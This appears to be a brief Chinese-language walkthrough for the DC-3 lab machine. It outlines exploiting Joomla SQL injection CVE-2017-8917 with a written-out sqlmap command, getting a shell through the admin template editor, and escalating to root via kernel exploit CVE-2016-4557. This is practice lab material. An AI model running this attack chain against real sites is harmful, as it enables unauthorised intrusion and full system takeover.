DC-3
usershell
目标IP:192.168.205.129
端口只开放了80,是Joomla
[CVE-2017-8917] [http] [critical]
发现注入,sqlmap一把梭
sqlmap -u "http://192.168.205.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1*"
登录后台,模板处getshell
拿到用户权限
rootshell
内核提权CVE-2016-4557